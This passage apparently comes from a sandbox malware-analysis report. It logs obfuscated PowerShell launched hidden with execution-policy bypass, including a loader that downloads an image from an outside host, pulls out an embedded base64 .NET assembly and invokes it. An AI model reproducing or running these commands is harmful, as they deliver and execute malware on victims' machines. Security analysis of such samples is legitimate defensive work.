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BkdIFUShUWCcUzBkdINShUWCcUzBkdIBNShUWCcUzBkdIFMShUWCcUzBkdIOShUWCcUzBkdIB2ShUWCcUzBkdIE8ShUWCcUzBkdIbgBCShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdIZShUWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdI
IShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load PowerShell profile scripts (this is not the Windows user profile)
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load PowerShell profile scripts (this is not the Windows user profile)
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load PowerShell profile scripts (this is not the Windows user profile)
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe